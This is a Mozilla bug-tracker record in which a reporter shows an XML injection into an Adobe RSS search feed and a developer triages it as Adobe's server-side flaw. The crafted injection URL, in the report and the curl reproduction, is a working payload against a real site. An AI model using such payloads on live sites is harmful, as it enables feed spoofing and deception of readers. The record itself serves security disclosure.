Closed
Bug 1330256
Opened 8 years ago
Closed 8 years ago
HTML Injection into RSS reader (II)
Categories
(Firefox :: Untriaged, defect)
Tracking
()
RESOLVED
INVALID
People
(Reporter: jm.acuna73, Unassigned)
Details
User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Steps to reproduce:
This time we can close the <title> tag and thus manipulate the entire xml document in the adobe.com domain.
In this example I show a single item but I could add as many as I wanted by modifying the value of the itemsPerPage parameter
https://color.adobe.com/rss/search.cfm?searchQuery=HTML Injection into RSS reader (II)</title><item><title>HTML Injection into RSS reader (II)</title><link>https://bughunter.withgoogle.com/profile/0d0d6514-b648-4105-b73a-bbed4352e9bc</link><description><![CDATA[
<h4><font color='brown'>Perfil</font></h4>
Tras terminar mi formacion de estudios superiores, me especialice en la programacion en tecnologia web.<p> Desde entonces trabajo como analista-programador en la empresa Baratz, Servicios de Teledocumentacion.</p>Tambien formo parte del equipo de nuevas tecnologias de la empresa Finanser Asesores y soy webmaster de la firma delPueyoDiaz.<p>Muy interesado en tecnologia movil.</p>
<h4><font color='brown'>Entornos web</font></h4>
(X)HTML, HTML5, CSS 2, CSS3, Javascript, AJAX, JQuery, cross-browser, xml, xslt, estanadarizacion w3c, JQuery Mobile, Sencha Touch 2.0 (Mobile App Development Platform).<p>
<img border='1' title='profile' src='https://media.licdn.com/mpr/mpr/shrinknp_200_200/p/8/000/1ce/09e/0c204d9.jpg' height='100' hspace='20' vspace='0'><a href='https://bughunter.withgoogle.com/profile/0d0d6514-b648-4105-b73a-bbed4352e9bc'><strong>jm.acuna73@gmail.com</strong></a></p>
]]></description><pubDate> Thu, 01 Dec 2016 14:50:58 GMT</pubDate><author><![CDATA[Hack jm.acuna73@gmail.com]]></author></item><title>'HTML Injection into RSS reader (II)&key=4EA137CD2D1440A2CF7CA183070D11F7&itemsPerPage=1
Tested on Mozilla Firefox 50.1.0, Google Chrome Versión 55.0.2883.87 m with extension https://chrome.google.com/webstore/detail/rss-subscription-extensio/nlbjncdgjeocebhnmkbbbdekmmmcbfjd
and Internet Explorer 11
Actual results:
I can manipulate the entire contents of the xml document
Expected results:
The feed reader should be able to escape certain characters
Comment 1•8 years ago
|
||
This is an XML injection flaw in Adobe's website. The actual XML document contains your markup, and so we parse it correctly, because it's what the server gives us. You can see this both if you 'view source' on the feed and if you fetch it with e.g. curl (I used a shorter version of your example, and URI escaped it for use in the terminal):
$ curl 'https://color.adobe.com/rss/search.cfm?searchQuery=HTML%20Injection%20into%20RSS%20reader%20(II)%3C%2Ftitle%3E%3Citem%3E%3Ctitle%3EHTML%20Injection%20into%20RSS%20reader%20(II)%3C%2Ftitle%3E%3Clink%3Ehttps%3A%2F%2Fbughunter.withgoogle.com%2Fprofile%2F0d0d6514-b648-4105-b73a-bbed4352e9bc%3C%2Flink%3E%3Cdescription%3E%3C!%5BCDATA%5B%20Hello%20%5D%5D%3E%3C%2Fdescription%3E%3CpubDate%3E%20Thu%2C%2001%20Dec%202016%2014%3A50%3A58%20GMT%3C%2FpubDate%3E%3Cauthor%3E%3C!%5BCDATA%5BHack%20jm.acuna73%40gmail.com%5D%5D%3E%3C%2Fauthor%3E%3C%2Fitem%3E%3Ctitle%3EHTML%20Injection%20into%20RSS%20reader%20(II)&key=4EA137CD2D1440A2CF7CA183070D11F7&itemsPerPage=1'
<?xml version="1.0" encoding="UTF-8"?>
<rss
xmlns:xs="http://www.w3.org/2001/XMLSchema"
xmlns:rss="http://blogs.law.harvard.edu/tech/rss"
xmlns:kuler="http://kuler.adobe.com/kuler/API/rss/" version="2.0">
<channel>
<title>kuler search results for 'HTML Injection into RSS reader (II)</title><item><title>HTML Injection into RSS reader (II)</title><link>https://bughunter.withgoogle.com/profile/0d0d6514-b648-4105-b73a-bbed4352e9bc</link><description><![CDATA[ Hello ]]></description><pubDate> Thu, 01 Dec 2016 14:50:58 GMT</pubDate><author><![CDATA[Hack jm.acuna73@gmail.com]]></author></item><title>HTML Injection into RSS reader (II)'</title>
<link>https://color.adobe.com</link>
<description>0 kuler themes were found. Displaying results 1 to 1.</description>
<language>en-us</language>
<pubDate/>
<lastBuildDate/>
<docs>http://blogs.law.harvard.edu/tech/rss</docs>
<generator>Kuler Services</generator>
<managingEditor>kulerfeedback@adobe.com</managingEditor>
<webMaster>kulerfeedback@adobe.com</webMaster>
<recordCount>0</recordCount>
<startIndex>0</startIndex>
<itemsPerPage>1</itemsPerPage>
</channel>
</rss>
For this to be a Firefox bug, the </title> closing would have to have been XML-escaped by the server, which it hasn't been.
Marking INVALID because it's not a Firefox bug (which also explains why you can reproduce it elsewhere!). I suggest you report it to Adobe instead. Keeping sec-sensitive because they might want to fix it before it's public.
Status: UNCONFIRMED → RESOLVED
Closed: 8 years ago
Resolution: --- → INVALID
Reporter | ||
Comment 2•8 years ago
|
||
Thanks Gijs,
the Adobe team is also aware of the bug.
Updated•8 years ago
|
Group: firefox-core-security → core-security-release
Reporter | ||
Comment 3•8 years ago
|
||
It can be made public.
The bug has been fixed by the Adobe team: https://hackerone.com/reports/187648
Thanks!
Updated•8 years ago
|
Group: core-security-release
You need to log in
before you can comment on or make changes to this bug.
Description
•